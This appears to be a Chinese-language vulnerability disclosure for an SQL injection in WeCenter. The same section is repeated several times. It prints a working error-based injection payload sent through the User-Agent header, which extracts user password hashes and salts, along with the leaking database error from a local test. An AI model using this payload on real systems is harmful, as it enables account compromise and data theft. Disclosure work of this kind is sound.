### 简要描述: 无视GPC注入 ### 详细说明: 设置user_agent 注入语句为 ``` ' and(select 1 from(select count(*),concat((select concat(password,0x23,salt,0x23) from aws_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# ``` [<img src="https://images.seebug.org/upload/201503/281149270cba08e5282fecb2696439a2311aa1ce.jpg" alt="QQ截图20150328114841.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/281149270cba08e5282fecb2696439a2311aa1ce.jpg) 然后挂着页面几分钟 再去访问任意页面就可以了 [<img src="https://images.seebug.org/upload/201503/28114958b25d87e060c52ca444fa3472d32a58e7.jpg" alt="QQ截图20150328114905.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/28114958b25d87e060c52ca444fa3472d32a58e7.jpg) 可以看到报错了 ``` Database error ------ SQL: UPDATE `aws_users_online` SET `uid` = '2', `last_active` = '1427514371', `ip` = '2130706433', `user_agent` = '' and(select 1 from(select count(*),concat((select...
### 简要描述: 无视GPC注入 ### 详细说明: 设置user_agent 注入语句为 ``` ' and(select 1 from(select count(*),concat((select concat(password,0x23,salt,0x23) from aws_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# ``` [<img src="https://images.seebug.org/upload/201503/281149270cba08e5282fecb2696439a2311aa1ce.jpg" alt="QQ截图20150328114841.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/281149270cba08e5282fecb2696439a2311aa1ce.jpg) 然后挂着页面几分钟 再去访问任意页面就可以了 [<img src="https://images.seebug.org/upload/201503/28114958b25d87e060c52ca444fa3472d32a58e7.jpg" alt="QQ截图20150328114905.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/28114958b25d87e060c52ca444fa3472d32a58e7.jpg) 可以看到报错了 ``` Database error ------ SQL: UPDATE `aws_users_online` SET `uid` = '2', `last_active` = '1427514371', `ip` = '2130706433', `user_agent` = '' and(select 1 from(select count(*),concat((select concat(password,0x23,salt,0x23) from aws_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#', `active_url` = 'http://127.0.0.1/wecenrt/?/search/q-MQ==' WHERE uid = 2 Error Message: Mysqli statement execute error : Duplicate entry '96a3a28f5c885b97db259b74bc2fddf1#dxaw#1' for key 'group_key' ``` 我是本地搭建测试的 ### 漏洞证明: 设置user_agent 注入语句为 ``` ' and(select 1 from(select count(*),concat((select concat(password,0x23,salt,0x23) from aws_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# ``` [<img src="https://images.seebug.org/upload/201503/281149270cba08e5282fecb2696439a2311aa1ce.jpg" alt="QQ截图20150328114841.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/281149270cba08e5282fecb2696439a2311aa1ce.jpg) 然后挂着页面几分钟 再去访问任意页面就可以了 [<img src="https://images.seebug.org/upload/201503/28114958b25d87e060c52ca444fa3472d32a58e7.jpg" alt="QQ截图20150328114905.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/28114958b25d87e060c52ca444fa3472d32a58e7.jpg) 可以看到报错了 ``` Database error ------ SQL: UPDATE `aws_users_online` SET `uid` = '2', `last_active` = '1427514371', `ip` = '2130706433', `user_agent` = '' and(select 1 from(select count(*),concat((select concat(password,0x23,salt,0x23) from aws_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#', `active_url` = 'http://127.0.0.1/wecenrt/?/search/q-MQ==' WHERE uid = 2 Error Message: Mysqli statement execute error : Duplicate entry '96a3a28f5c885b97db259b74bc2fddf1#dxaw#1' for key 'group_key' ``` 我是本地搭建测试的
